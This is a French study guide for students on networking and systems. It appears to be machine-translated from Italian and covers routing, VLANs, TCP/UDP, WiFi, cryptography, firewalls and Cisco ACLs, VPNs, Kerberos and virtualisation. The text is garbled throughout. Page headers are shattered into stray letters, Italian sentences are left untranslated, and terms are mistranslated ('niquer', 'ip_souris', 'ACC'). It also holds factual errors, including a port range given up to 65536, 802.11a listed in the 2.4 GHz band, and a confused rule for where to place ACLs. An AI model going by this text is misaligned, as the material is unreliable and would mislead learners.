contemporané). Utilise l'algorithme de Bellman-Ford pour le calcul du chemin le plus court
brève. Bellman-Ford a le problème de ne pas détecter les boucles (cycles) infinies, pour lesquelles il
ils utilisent l'empoisonnement de route (essaient de bloquer en mettant le coût à l'infini les routes vers lesquelles)

le coût augmente progressivement) et/ou le split horizon (je ne communique pas à un nœud voisin
parcours qui s'apprennent à partir de ce nœud).
GU
D
IE
D
T
ESIHÈME
E
SR
TÉSEAUX
POUR
AUTO
E
É
T
S
.T
O
U
.P
.D
T
P
S
A
INTS

diffusion toutes les 30 secondes, et si la route n'est pas mise à jour dans les 3 minutes, elle est mise à
distance 16 et ensuite retirée.

IGRP : protocole de routage de type Distance Vector propriétaire de CISCO. Il a un compte de saut
di 255 et permet de avoir plus d'entrées dans les tableaux pour la même destination.

Un trou noir : c'est un point du réseau où les paquets sont rejetés parce qu'ils ne peuvent pas être trouvés.
une destination.

Comptez jusqu'à l'infini : cela se vérifie lorsque le coût pour atteindre une destination ne plus
accessible est progressivement augmenté à l'infini.

VLAN : c'est une technique qui permet de mettre en place plusieurs réseaux locaux divisés au niveau logique mais
qui partagent la même infrastructure physique. Elles sont gérées via des commutateurs appropriés.
administrables, permettant de préparer différents segments de réseau dans lesquels les
des systèmes et dispositifs individuels peuvent communiquer entre eux sans avoir besoin d'un routeur,
garantissant une grande évolutivité du réseau. Avec les VLAN, on réalise des domaines de diffusion
séparément, garantissant les performances du réseau. Avec l'utilisation du protocole 802.1Q, il est possible
étendre les VLAN sur d'autres réseaux physiques en connectant les commutateurs via des ports appropriés
dette de «tronc». Il en existe deux types :

- port VLAN : les ports du switch sont attribués aux VLAN, l'association est faite
directement par connexion entre l'appareil et le switch (attribution statique);

- VLAN taguée : un tag est ajouté dans le cadre ethernet (32 bits de long) après
l'adresse MAC, qui identifie le VLAN d'appartenance via un VID (identifiant de VLAN), qui
consente de gérer jusqu'à 4096 VLAN différentes. Les trames appartenant à des VLAN différentes sont
instradés à travers des ports trunk. Le port trunk peut également servir à connecter le commutateur
un serveur qui fournit des services à plusieurs VLAN, dans ces cas pour réaliser l'inter-VLAN
Le routage si utilise un switch L3, qui est une sorte de routeur qui opère sur le réseau local.

Routage Inter-VLAN : pour permettre la communication entre différentes VLAN, un appareil est nécessaire.
routage. Chaque VLAN doit avoir une passerelle qui permet le routage, c'est-à-dire que le routeur doit
posséder une interface pour chaque VLAN à mettre en communication. Il est possible d'utiliser
GU
D
IE
DE
T
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
T
SOP…
T
P
SIE
ÉTUD
A
INTS

QU
U
EL
D
E
C
Q
PT
H
U
S
C
UO
E
P
RSE
TCP : c'est un protocole de la couche de transport de la suite TCP/IP orienté vers la connexion, la
la transmission des données se fait de manière bidirectionnelle uniquement après qu'elle a été établie
connexion entre les appareils. Inclure un système de contrôle de la livraison des colis.
Il a une architecture de type client/serveur.

Handshake en 3 voies : c'est la procédure par laquelle la connexion TCP se fait entre deux hôtes.
3messagesareexchanged,inwhichcertainfieldsandflagsareset:

• l'hôte A envoie un segment SYN à l'hôte B (le drapeau SYN est défini sur 1 et le champ
Le numéro de séquence (seq) contient la valeur x qui spécifie le numéro de séquence initial (ISN)
di A);
A -> B SYN, seq=x

• B envoie en réponse un segment SYN/ACK à A (les drapeaux SYN et ACK sont réglés à 1, le
le champ seq contient la valeur y qui spécifie l'ISN de B et le champ numéro d'accusé de réception
(ack) contient la valeur x+1 confirmant la réception de l'ISN de A;
B -> A SYN/ACK, ack=x+1, seq=y

• A envoie en réponse un segment ACK à B (le drapeau ACK est réglé sur 1 et le champ ack
contient la valeur y+1 confirmant la réception de l'ISN de B).
A -> B ACC, acc=y+1, seq=x+1

Le troisième segment sert à l'hôte B pour estimer le timeout initial comme le temps écoulé entre
l'envoi d'un segment et la réception de l'ACK correspondant. Le drapeau SYN trouve une particulière
utilisation dans les pare-feu car les segments avec le drapeau non actif appartiennent à des connexions déjà
stabilité.

Le scan SYN : c'est un scan réseau effectué pour détecter les ports ouverts sur un hôte.
la présence d'un pare-feu, l'ACK (dernier étape du handshake en 3 étapes) n'est pas envoyé pour
rendre plus difficile la détection de la numérisation en cours.

Multiplexage : le TCP permet de faire transiter sur une même ligne des données provenant de
GUD
IA
D
SIS
TEM
EIRET
PIER
AUTOS
TOPPS
IT

IES
TUDENTI

Porte: utilizzate nelle socket, sono composte da 16 bit, e quindi variano tra i valori 0 e
65536. LoIANA (Autorité des numéros attribués sur Internet) est l'organisme qui gère
l'attribution standard des ports aux différents services de réseau et applications :

• De 0 à 1023, ce sont des ports bien connus, et ils sont attribués aux services les plus courants (DNS
port 53, SMTP port 25, FTP port 21, HTTP port 80, etc…);

• De 1024 à 49151, on les appelle Ports enregistrés, et ils sont généralement enregistrés par des entreprises.
auprès de l'IANA pour ses propres applications;

• les ports restants jusqu'à 65536 sont appelés Ports Dynamiques, et sont utilisés au besoin pour
les connexions.

UDP : c'est un protocole de transport sans connexion, basé sur le transfert de


Les datagrammes, par leur nature, ne garantissent pas qu'ils parviennent à destination, la retransmission en
en cas de perte d ’information, et la séquence correcte à la réception, pour ces raisons il est
définitivement non fiable. Cependant, il trouve son utilité pour des communications où l'objectif est de réduire
la durée de la transmission, car il n'est pas nécessaire d'établir une connexion avec le destinataire et
attendre une réponse : transmission audio et vidéo, communication multicast et en temps réel,
DNS, SNMP.
GUD
IE
DE
S
T
IHÈMEE
ST
RÉSEAUX
POUR
AUTOT
SOPP
T
S
I…
IE
ÉTUDA
INTS

P
2Q
LU
E
E
C
S
U
LH
Q
R
OU
E
S

P2P : pair à pair, est un modèle de réseau informatique dans lequel les nœuds sont « paritaires » (pairs)
au lieu d'être hiérarchisés comme client ou serveur. Chaque nœud peut avoir les deux fonctions
vers les hôtes du réseau. Ils se classent en trois catégories principales :

• Puro : il n'est pas doté de serveur central de support, chaque nœud s'occupe d'individualiser les
ressources réseau disponibles et les autres pairs. Est généralement intégrée avec une Virtuelle
Réseau superposé (overlay), où les nœuds forment un sous-réseau par rapport au réseau physique
principal, afin de pouvoir indexer et cartographier les nœuds en définissant la topologie du réseau.

• Serveur de découverte : s'appuie sur un serveur central (Discovery) auquel chaque pair communique
propre existence au moment du démarrage et reçoit une liste avec les autres noms du réseau. Le
le pair primaire contacte le serveur individuellement puis transmet la demande.

• Discovery + Serveur de recherche : comme pour le P2P avec le serveur de découverte, mais chaque pair envoie

une liste de ses contenus au serveur à intervalles réguliers. À chaque demande, le serveur
fournit une liste des participants au réseau ainsi que leurs contenus, réduisant
richieste senza esito e ottimizzando i tempi.

P2P structurée : elle a une topologie spécifique, qui assure que chaque nœud puisse
chercher et trouver une ressource ou un nœud de manière efficace. Intègre une table de hachage distribuée,
à l'intérieur de laquelle chaque ressource correspond à un code identifiant unique.

P2P non structuré : les nœuds créent des connexions aléatoires avec d'autres nœuds du réseau.

Sécurité : les principaux programmes de connexion aux réseaux P2P prévoient que l'utilisateur
met à disposition, en plus de la bande de connexion, également de l'espace sur son propre disque pour
le partage de fichiers, en ouvrant également certaines portes de son système pour le partage de fichiers.

Légalité : selon la législation italienne, quiconque télécharge une œuvre protégée par
le droit d'auteur et le partage est un délit pénal s'il le fait « sans en avoir »
droit, à toute fin et sous toute forme.

BitTorrent : c'est l'un des protocoles pour les réseaux de partage de fichiers p2p les plus répandus, utilise un algorithme
GUD
IE
DE
S
T
IHÈMEE
ST
RÉSEAUX
POUR
AUTO
TOPP
T

S
IIE
ÉTUDA
INTS

W
Q
F
IU
L
E
C
LS
U
Q
H
RU
O
ES

WiFi : technologie pour les réseaux sans fil basée sur la norme 802.11. Les points d'accès ont en
génère un portée de 20 mètres à l'intérieur et environ 100 mètres à l'extérieur. La partie radio
constitue le réseau d'accès, le réseau câblé qui interconnecte les AP constitue le réseau de
transport. Il est typiquement opportun de ne pas faire gérer plus de 30 clients au même AP (cela dépend
de toute façon du matériel et de la bande).

Canaux : le Wi-Fi utilise différentes bandes de fréquence pour la transmission. Il est possible d'utiliser
une bande à 2,4 GHz (norme 802.11a, 802.11b et 802.11g) ou à 5 GHz (norme 802.11n et
802.11ac), divisée en canaux avec différentes sous-fréquences.
La bande de 2,4 GHz dispose de 14 canaux. Les canaux se chevauchent les uns avec les autres (environ avec
une plage de 4 canaux, donc le canal 5 se superposera avec les canaux 1, 2, 3, 4 et 6, 7, 8, 9)
sauf les canaux 1, 6 et 11, qui sont des canaux non superposables. La bande passante est de
20 MHz, et la vitesse maximale est de 144,5 Mbps. Il est possible d'utiliser une largeur de bande.
un 40MHz atteignant 300Mbps de vitesse, mais il est déconseillé car non conforme aux
directives IEEE et potentiellement source de perturbations et d'interférences pour les réseaux limitrophes.

La bande de 5 GHz dispose de 23 canaux, en Europe on utilise une largeur de bande de 20 MHz
qui permet d'avoir 8 canaux non superposés (26, 40, 44, 48, 52, 56, 60 et 64).
Le signal à 2,4 GHz passe mieux à travers les obstacles mais est plus sujet aux interférences, le signal à
5Ghz a une couverture plus réduite mais offre de meilleures performances de transfert de données.

Canaux bloqués : à 2,4 GHz, les canaux 12, 13 et 14 sont bloqués car interdits par la loi dans plusieurs pays.
états, car ils peuvent par exemple être réservés aux forces militaires. Les seuls toujours
utilisables sont le 10 et le 11 (l'Espagne bloque aussi de 1 à 9). À 5 GHz en Italie sont
Autorisez 19 canaux.

SSID : identifiant du réseau WiFi. Il peut être caché ou visible.

WEP : protocole pour la sécurité du WiFi qui utilise deux clés de 64 ou 128 bits pour la
Chiffrement. Actuellement, il présente de sérieux problèmes de sécurité étant facilement violable en peu de temps.

minuts de nombreux logiciels courants.

WPA2: Wi-Fi Protected Access, protocollo per la sicurezza delle reti WiFi che utilizza chiavi
GU
D
IE
DE
T
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
T
SOP…
T
P
SIE
ÉTUD
A
INTS

WPS : c'est un système de distribution des clés pour le WiFi afin de simplifier la
connexion des dispositifs dans les réseaux domestiques, qui repose sur un PIN et un accès physique
(typiquement un bouton placé sur l'AP ou sur l'hôte à connecter). Il est vulnérable aux attaques
de force brute pour la récupération du PIN et ne doit donc pas être activé si possible.

RADIUS : Service d'authentification à distance des utilisateurs par connexion, est un protocole qui sert à garantir
les exigences AAA pour l'accès à un réseau protégé. Utilise des paquets UDP pour le transport de
informations d'authentification et de configuration entre un serveur d'authentification (serveur de
accès au réseau, NAS - Serveur d'Accès au Réseau, en général un routeur) qui vérifie les
identifiants d'accès (nom d'utilisateur et mot de passe) en communiquant (de manière cryptée) avec
un serveur d'authentification (le serveur RADIUS) équipé d'une base de données d'utilisateurs autorisés. Le
Le NAS attribue généralement au client, s'il est autorisé, la configuration IP pour l'accès au réseau et
à ses services (intègre souvent un serveur DHCP).

Hotspot: punto di accesso pubblico a una rete WiFi.

WDS: Wireless Distribution System, tecnologia per la ripetizione del segnale WiFi ai vari
AP faisant partie d'un réseau, dans le cas où il n'est pas possible de les câbler. Cela présente un problème de
perte de performance dans la bande à mesure que le nombre de points d'accès en WDS augmente, car ils doivent
travailler sur le même canal (et sur le même SSID), où chaque AP fonctionne également comme un pont. Le
la bande passante utile de transmission est pratiquement réduite de moitié pour chaque point d'accès traversé.
GUD
IE
DE
T
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
T
SOPP

T
S
IEÉTUDA
INTS

QUELQ
C
UH
C
E
L
SO
R
U
A
Y
SR
E
PTOGRAPHE
I
Crittologia : (kryptos “caché” - logos “mot”) science qui s'occupe des écritures
cachées, qui ont leurs fondements dans les mathématiques et l'informatique.

Cryptographie : branche de la cryptologie qui étudie les systèmes pour cacher les messages et les
informations grâce à l'opération de chiffrement. Un algorithme de cryptographie
doit être facilement computable et inversible si la clé est connue, et difficilement
inversible en l'absence de la clé.

Crittanalisi : branche de la cryptologie qui s'occupe de trouver des systèmes pour déchiffrer
(déchiffrement) messages chiffrés.

Code: un ensemble de règles pour chiffrer un texte.

Crittogramma : texte qui a subi un chiffrement.

Clé : c'est une information utilisée dans le processus de chiffrement par un algorithme.

Cryptographie symétrique (ou à clé privée) : technique de chiffrement dans laquelle la clé est
utilisée pour chiffrer et déchiffrer un texte. Les algorithmes à clé symétrique sont en moyenne
rapides dans l'exécution, cependant leur sécurité est liée à la confidentialité de la clé. Dans un
comunicazione la criticità è lo scambio della chiave tra mittente e destinatario.

Cryptographie asymétrique (ou à clé publique) : technique de chiffrement dans laquelle une clé
elle est utilisée pour chiffrer un texte et une clé différente est utilisée pour le déchiffrer. Les algorithmes
les clés publiques sont lentes à exécuter, mais elles contournent le problème de l'échange des
clés. En général, la clé publique est utilisée pour chiffrer, la clé privée pour
décoder, afin de garantir la confidentialité de la communication. Si, au contraire, on utilise le
la clé privée pour chiffrer et la clé publique pour déchiffrer obtient un mécanisme de
certification de l'identité de l'expéditeur d'un document.

Cryptographie à technique mixte : à cause de la lenteur des algorithmes à clé asymétrique, on


utilise cette technique pour l'échange de la clé privée qui sera ensuite utilisée pour démarrer une
communication à cryptographie symétrique.
G
U
D
S
YIE
S
T
ÈM
TE
M
SR
E
T
É
P
S
EA
UP
O
XU
A
R
UT
OM
…A
T
O
E
É
IS
T
P
U
ID
A
IN
T
S

• Non-répudiation : garantie que l'expéditeur ne peut pas nier avoir envoyé le message ;

• Intégrité : garantie que le message n'a pas été altéré.

Protocole AAAA : c'est un ensemble de règles et de spécificités qui réalisent dans le contexte
informaticiens les principes d'Authentification, d'Autorisation,
Contabilizzazione (Accounting) e Revisione (Auditing)

• Authentification : démonstration de son identité ;

• Autorisation : vérification des privilèges d'accès et consultation d'informations et de ressources ;

• Comptabilité : suivi des ressources utilisées (par exemple via des fichiers LOG) ;

• Audit : vérification de la conformité des surveillances effectuées par le biais de la comptabilité.

Principe "CIA": Confidentialité (Confidentiality) entendue comme protection de la lecture


de l'information par des sujets non autorisés, Intégrité (Integrity) entendue comme protection
de la modification non autorisée de l'information, Disponibilité (Availability) entendue comme
la garantie de pouvoir accéder à ses données quand on en a besoin est l'un des 3 piliers de
sécurité informatique.

Ciffrage de Vigenère : technique de chiffrement par laquelle chaque caractère individuel est chiffré.
message déplaçant la lettre à chiffrer d'un nombre de positions variable déterminé en fonction
à un mot clé (dettaverme), qui est répété sous le message;

OTP - One Time Pad (également appelé Chiffrement de Vernam) : c'est une technique de chiffrement (basée
sur la technique du Chiffre de Vigenère) où une clé aléatoire de la même longueur que le
texte à chiffrer, utilisable une seule fois. Le texte chiffré n'a plus aucune relation avec
celui d'origine. Sans connaître la clé, il est impossible de déchiffrer le message.

Critère de Shannon : un chiffrement est sûr si le texte chiffré ne révèle aucune information.
sur le texte en clair. Chaque message chiffré doit être d'une longueur au moins égale à celle du message en
clair.

Confusion: principe indiqué par Shannon, il ne doit pas y avoir de relation entre la clé et le texte.
GU
D
IE
DE
T
SIS
HÈME
E
SR
TÉSEAUX
POUR
AUTO
T
SOP

T
P
SIEÉ
TTUD
A
INTS

Effet avalanche (critère d'avalanche) : capacité d'un algorithme de cryptographie à produire des résultats
modo que par la modification d'un seul caractère du texte clair il y ait l'altération de
tout le texte chiffré (principe de diffusion), et que la modification d'un seul caractère de
la clé implique l'altération de tout le texte chiffré (principe de confusion). C'est
important, car si deux textes en clair similaires produisaient des textes chiffrés similaires, on pourrait
retrouver la clé.

Principe de Kerckhoffs : la sécurité d'un système de cryptographie doit dépendre uniquement de


la sécurité de la clé, par conséquent, l'algorithme peut être rendu public.

Attaques actifs : menaces à l'intégrité et à la disponibilité des données.

Attaques passifs : menaces à la confidentialité des données. Ce sont les plus difficiles à identifier.

RSA : un algorithme à clé publique particulièrement robuste, basé sur la complexité


calcul de la factorisation en nombres premiers, dans lequel malgré les deux clés sont
générer avec un procédé mathématique dans lequel une clé est calculée à partir de l'autre
il est très difficile sur le plan computationnel de remonter de l'un à l'autre. Actuellement avec une
Une clé de 2048 bits garantit la sécurité du texte chiffré.
GUD
IE
DE
SS
ITHÈMES
ET
RÉSEAUX
POUR
STUDENTS

P
R
OX
YL
ER
EF
T
E
IW
A
LL
EQ
U
SR
C
U
H
E
LQ
O
E
U
SE

Défense périmétrique : ensemble des techniques pour la protection d'un réseau, à mettre en œuvre
entre le réseau externe et le réseau interne, sur le « périmètre » du réseau à protéger.

Pare-feu : élément passif de défense périmétrique d'un réseau. La défense par pare-feu dans
la générale s'occupe d'empêcher les accès non autorisés, du contrôle du trafic de données et de
blocage de tout trafic dû à des logiciels malveillants. Les pare-feu fonctionnent par le biais d'ensembles de règles de

filtrage. Il existe différents types de pare-feu :

• Pare-feu personnel : ce sont des logiciels de pare-feu installés directement sur la machine.
protéger. Par leur nature, ils sont moins sûrs, ils peuvent servir à contrôler sur une
machine les applications qui accèdent au réseau externe par exemple, ou dans des contextes privés et
non commerciaux.

• Pare-feu à filtre de paquets : s'occupent de filtrer les paquets individuellement selon les données
contenus dans les en-têtes. C'est un type de filtrage simple et léger au niveau de
ressources (et donc rapide). Ils opèrent principalement sur les 3 premiers niveaux de la pile OSI. Ce
la technique est sujette à des attaques de spoofing IP.

• Pare-feu à inspection étatique : les paquets sont analysés comme dans le filtrage de paquets
Pare-feu, en tenant compte des ports, de l'état de la connexion et des protocoles
utilisés, et donc aussi des paquets précédents d'une transmission d'informations.
Ils analysent jusqu'au niveau 4 de la pile OSI, fonctionnent via des tableaux qui peuvent subir
attaques de type DOS de saturation du contenu. Utilise des tableaux pour stocker à
exemple des numéros seq et ack d'une connexion TCP et les messages ACK et SYN correspondants
échangés.

• Pare-feu d'application : ils sont spécifiques à une application déterminée, analysant donc
fino au niveau 7 de la pile OSI. Ils sont très sûrs, mais impliquent une excessive
ralentissement sur le réseau.
GU
D
IE
DE
T
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
T
SOP…
T
P
SIE
ÉTUD
A
INTS

DMZ (zone démilitarisée) : c'est une zone du réseau interposée entre le réseau externe et le réseau
interne, utilisée pour permettre l'accès depuis le réseau public externe à un serveur ou à d'autres
composants, par exemple, serveur mail et serveur web, afin de ne pas compromettre le réseau
interne à protéger. Il est possible d'utiliser plusieurs pare-feu pour isoler les DMZ, qui
généralement, ils agissent avec des systèmes de type filtre de paquets, et permettent la communication depuis

partie des machines dans le réseau interne via le service NAT. Elles peuvent cependant être
sujet aux attaques passives telles que le sniffing et aux attaques actives telles que le spoofing.

Hôte bastione : c'est la machine placée comme premier point de défense périmétrique d'un réseau.
configurée pour être spécialisée dans la protection contre les attaques extérieures.

ACL (Liste de Contrôle d'Accès) : c'est une liste de règles qui détermine les accès autorisés et interdits.
toutes les ressources d'un réseau. Les règles sont appelées Access Control Entry (ACE). Les règles se
consultation en ordre en partant de celle en haut de la liste jusqu'à la dernière, jusqu'à ce que cela se vérifie
une correspondance (match) : dans ce cas, la règle correspondante s'applique. En cas de non
vérifiez aucun match, la politique par défaut sera appliquée.

Quelques références et commandes :

• Politique par défaut de refus : dans laquelle le trafic est bloqué par défaut, les règles indiquent quelles
Les types de trafic autorisés. C'est le critère qui permet une plus grande sécurité.

• Default-allow: politique dans laquelle le trafic est autorisé par défaut, les règles indiquent
Quels types de trafic sont bloqués.

• permettre : indique l'action de permettre le trafic en cas de correspondance.

• refuser : indique l'action de bloquer le trafic en cas de correspondance.

• Masque de wildcard : indique quels bits d'une adresse IP doivent être vérifiés par la règle
dans l'ACL. Les bits à 1 dans le masque correspondent aux bits qui ne doivent pas être contrôlés.
Pour contrôler un sous-réseau entier, la valeur du masque de wildcard est obtenue en soustrayant à
[Link] la valeur du masque de sous-réseau concerné.

• hôte : correspond à l masque wildcard [Link]


GU
D
ID
ET
E
SH
ISÈMES
R
TÉSEAUX
POUA
RUTO
T
S
O…
P
TP
S

S
E
TUD
A
INTS

Le normes ACL spécifient seulement la source du trafic (elles doivent être placées près de la
source de destination), les ACL étendues spécifient également la destination, les ports et le
protocole (doivent être placées près de la source à filtrer).

Exemple de désintaxi de l'ACL standard :

Routeur(config)# liste_d'accès numéro_ACL refuser|permettre ip_souris masque_de_wildcard

Routeur(config)# liste d'accès 1 permettre hôte [Link]


//autorise le trafic à l'hôte [Link]

Routeur(config)# liste d'accès 1 autoriser [Link] [Link]


//permet le trafic au réseau 172.16.X.X avec un masque de wildcard [Link]

ACL 1 Source Masque wildcard src Action

1 [Link] [Link] permis

2 [Link] [Link] Permis

* Nier

Exemple de syntaxe ACL étendue :

Routeur(config)# liste-d'accès numéro-ACL [niquer|permettre] protocole ip_souris masque_wildcard


ip-destination wildcard_mask condition application

Routeur(config)# liste d'accès 101 autoriser tcp [Link] [Link] tout eq 25


//autorise le trafic TCP du réseau 172.16.2.x sur le port 25

Routeur(config)# liste d'accès 1 interdire tcp n'importe quel n'importe quel eq 80

//bloque tout le trafic avec le protocole TCP sur le port 80

ACL 1 Sorgente Masque de joker Protocole Destination Masque de wildcard Action


src dst

1 [Link] [Link] tcp [Link] [Link] Permis

2 [Link] [Link] tcp [Link] [Link] Nier

* Nier
GU
D
IE
DE
SYSTÈME
E
ST
RÉSEAUX
POUR
AUTO
T
SOP…
T
P
SIET
ÉTUD
A
INTS

peut fournir les réponses si elles ont été mémorisées sans avoir à les demander à nouveau au serveur,
accélérant la communication. Le proxy peut surveiller et réguler les demandes (dans ce cas
fonctionne conceptuellement comme un pare-feu) à travers des règles appropriées, empêchant le trafic
vers des services non autorisés (par exemple, dans un réseau scolaire, l'accès peut être interdit)
réseaux sociaux d'IA ou à des sites malveillants ou interdits aux mineurs en fonction de listes appropriées qui les

raccolgono). L'utilisation d'un proxy permet également d'avoir un unique point de sortie de la
réseau interne pour les demandes effectuées vers des services externes au réseau lui-même, améliorant la
sécurité, et en masquant à l'extérieur les machines qui ont demandé le service ou la ressource,
garantissant l'anonymat (par exemple comme dans le cas de TOR).
GU
D
IE
DS
E
U
IJET
E
ST
RÉSEAUX
POUR
AUTO
T
SOP…
T
P
SIET
ÉTUD
A
INTS

QUE
V
L
P
CQ
L
N
H
E
S
USO
E
R
SE

VPN : un service de communication sûr et fiable qui crée un canal virtuel entre deux ou
plus de machines qui s'implémentent sur une infrastructure de réseau public (ce qui les rend
particulièrement flexibles et évolutives), caractérisée par des technologies qui garantissent les principes
de confidentialité, d'intégrité et d'authentification. Les VPN sont généralement utilisés pour
consentir l'accès aux ressources d'un réseau privé à des utilisateurs externes physiquement hors du réseau
stessa, ou pour permettre de maintenir une connexion sécurisée entre des sites distants et le siège
centrale d'une même entreprise. Avec des appareils périmétriques appropriés, un
tunneling sur internet.

Letunneling:c'estletermequireprésenteidéalementlaréalisationdelaconnexionsécurisée
dans un VPN, comme si un "tunnel" était creusé dans le réseau public à l'intérieur duquel se déroule la
communication protégée.

VPN distante : permet d'accéder à distance aux données présentes dans un réseau d'entreprise. Cela se réalise
via un client de connexion installé sur les machines des utilisateurs qui se connecte à un serveur
VPN pour l'accès aux ressources distantes.

Le VPN site à site : permettent de connecter des sites géographiquement éloignés entre eux, via des
tunnels logiques permanents. Ils peuvent être Extranet (connectent les sites d'entreprises et
organisations externes) ou Intranet (connectent des sites externes de la même entreprise). Il existe
divers types d'implémentation :

• Fiable : elles sont réalisées au niveau 2 de l'ISO/OSI, elles sont souvent fournies par les FAI et non
ils nécessitent un tunneling et une cryptographie. Ce sont pratiquement des « parties » de réseaux publics
dédiquer à des connexions privées.

• Sécurisé : ils reposent sur des protocoles de cryptographie sûrs, tels que SSL/TLS ou IPSec.

• Hybride : utilisent une technique mixte, en pratique en intégrant la cryptographie dans les VPN.
Fiable.
GUD
IE
DESYSTÈMEE
ST
RÉSEAUX
POUR
AUTOT
SOPP
T

S
IIE
ÉTUDA
INTS

QUELQ
CU
H
L
A
E
SO
U
'U
R
SE
THENT
F
ICA
T
OIN
E
N
D
R
V
A
E
OIS
N
N
SN
E
MT
B
S
R
D
U
E
IN
É
S
T
S

Environnements distribués : ce sont des systèmes logiciels exécutés sur plusieurs machines distinctes qui
ils apparaissent comme une seule machine. Ils se caractérisent par le partage des ressources et
distribution de la charge, une grande évolutivité et tolérance aux pannes. Les systèmes et les réseaux qui les
ils sont souvent hétérogènes, leur communication se fait par des messages;
L'architecture est structurée en niveaux et gérée par le « middleware » (niveau intermédiaire), qui se
interpose entre les différents OS (niveau bas) et les applications destinées aux utilisateurs (niveau élevé).

Kerberos : c'est un système qui prend en charge la mise en œuvre de la sécurité dans les systèmes
distribués, établissant des canaux sûrs entre le client et le serveur. Il est composé d'une authentification
Le serveur AS authentifie un utilisateur et lui fournit une clé pour le canal, ainsi qu'un ticket.
Service TGS qui établit des canaux sécurisés avec un serveur via des "tickets" c'est-à-dire
clés secrètes cryptées. Le client obtient d'abord un ticket de longue durée de l'AS, valable
pour toute la session de communication, et par la suite, il obtient un billet de courte durée du TGS
pour demander le service individuel.

(Microsoft) Active Directory : c'est un service qui "stocke les informations relatives aux
objets sur le réseau et simplifie la recherche et l'utilisation de ces informations par les
administrateurs et utilisateurs. [...] utilise un référentiel de données structuré comme base pour
une organisation logique et hiérarchique des informations de répertoire.
Microsoft). Le service de "directory" est une sorte de base de données organisée optimisée pour la
lecture et recherche sur de grands ensembles de données, mis à disposition de toutes les entités d'un réseau via
un Contrôleur de Domaine (Domain Controller), qui possède une base de données contenant les données
d'accès et les autorisations de tous les utilisateurs, y compris les ressources réseau telles que les ordinateurs et
imprimantes, via un mécanisme de stratégie de groupe (Objet de Stratégie de Groupe - GPO). Les données
ils sont ensuite partagés avec les clients présents sur le réseau. En d'autres termes, il sera possible d'accéder
avec son propre utilisateur et avoir ses propres ressources toujours disponibles depuis n'importe quel PC en
entreprise (Authentification Unique - SSO).
GUD
IE
ST
S
IHÈMEE
ST
RÉSEAUX
POUR
AUTOT
SO
E
É
T
P.U
P
.T
S
.ID
IA
INTS

QUELQ
C
UH
E
L
S
OU
A
S
RE
V I R T U A L I S AT I O N

Virtualisation : c'est une technique qui permet d'exécuter l'abstraction du matériel physique et
rendre le logiciel disponible. Via un hyperviseur (appelé aussi VMM - Virtual)
Machine Manager) le système d'exploitation et les applications sont séparés du matériel
physique. La machine qui exécute la virtualisation (le système matériel) est appelée hôte,
Les machines virtualisées sont dites invitées. Le VMM crée et exécute les machines virtuelles.

Machine Virtuelle : c'est le logiciel qui crée l'environnement virtuel.

Techniques de virtualisation :

• Virtualisation complète : on réalise des systèmes virtuels du même type que le système
hôte physique

• Emulazione:si eseguono applicazioni su un sistema diverso da quello per cui sono scritte
(divers dallasimulazione, dans lequel un système d'exploitation est reproduit, même au niveau
logique

• Paravirtualisation : les OS invités accèdent au matériel physique de l'OS hôte par le biais de
API mises à disposition par l'hyperviseur, sans émuler le CPU;

• Virtualisation au niveau de l'OS : appelés également conteneurs, la virtualisation est gérée par
le noyau qui isole les ressources matérielles et logicielles utilisées par les différentes applications. Dans cette
les conteneurs techniques sont isolés les uns des autres, et aucune VM n'est utilisée et il n'y a pas de systèmes

invité (un exemple la technologie Docker).

• Virtualisation au niveau des applications : les systèmes dits ancherun-time permettent de


exécuter un programme indépendamment de l'architecture matérielle physique d'accueil (à
par exemple la Java Virtual Machine qui permet d'exécuter des programmes Java sur n'importe quel système d'exploitation

sur lequel il est disponible).


GU
D
IE
DT
E
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
E
T
S
T
ÉO
.T
.P
U
.P
T
S
D
IA
INTS

•Type 2 : dettihosted, exécutés sur un système d'exploitation comme application (par exemple
Oracle Virtual Box, VMWare Player.

Interprétation : elle se base sur la lecture de chaque instruction du code machine à exécuter et
sur son exécution sur le système hôte, exploitant la possibilité d'émuler des éléments de
d'autres architectures (différentes ou non présentes, comme par exemple les registres des CPU) exploitant
zones de mémoire. La méthode est puissante, mais implique de nombreuses instructions à exécuter et donc un
charge considérable sur le CPU. Un exemple d'émulateur basé sur l'interprétation est le
populaire MAME, qui permet d'émuler le fonctionnement des ROM contenant le code
machine à jeux vidéo "de salle de jeux".

Recompilation dynamique : des blocs de code sont lus, traduits et optimisés pour
l'architecture hôte, en utilisant autant que possible la mise en mémoire tampon de portions de code de
utilisation fréquente.
GUD
IE
DE
T
SIHÈMEE
ST
RÉSEAUX
POUR
AUTO
T
E
É
SO
T
.U
P
.P
T
.D
S
IIA
INTS

QUELQC
UH
EO
SL
É
U
SA
E
C
RURT

N
IFORMATQ
IA
UE
Attaques actives : utilisent des modes offensifs qui opèrent de manière directe (et
finalement destructive) sur les systèmes et les informations, par exemple des accès non autorisés,
modification ou suppression des informations, blocage des systèmes, usurpation d'identité
utilisateurs, etc...

Attaques passives : elles se limitent à la lecture des informations, à l'analyse du trafic, à l'"écoute".
sans apporter de modifications aux informations et aux systèmes.

Test de pénétration : processus d'analyse et d'évaluation de la sécurité d'un système informatique


ou d'un réseau, souvent effectué en utilisant divers types d'attaques, y compris l'ingénierie
sociale.

0-days : une vulnérabilité encore inconnue (ou à peine rendue publique, pour laquelle il y a 0
jours pour la fixer) attaquable par un exploit.

Zombie Zéro : une attaque informatique célèbre qui exploitait un malware inséré dans des lecteurs de
codes-barres pour lancer des backdoors en exploitant des connexions sans fil. C'est particulièrement
significatif parce qu'il montre le potentiel dangereux des dispositifs IoT.

Hacker : terme qui naît dans les premières communautés virtuelles passionnées de programmation
En informatique, le terme « hack » désigne « un projet en cours de développement ou un
produit réalisé à des fins constructives. C’est à la base de la philosophie du logiciel libre et
de l'open source, en particulier pour le plaisir de modifier et d'améliorer des travaux, des produits,
projets. Hacker est aujourd'hui (de manière un peu limitative) considéré comme un expert dans un domaine particulier

secteur, principalement informatique. Souvent confondu avec la figure du “cracker”.

Le cracker : c'est un expert en informatique et matières connexes qui exploite ses capacités à des fins
destructifs pour les systèmes des autres.

White Hat : c'est un hacker spécialisé dans les tests de pénétration à des fins éthiques telles que sensibiliser le

bersaglio di un problema o una vulnerabilità.


GU
D
IE
DE
T
SIHÈME
E
SR
TÉSEAUX
POUR
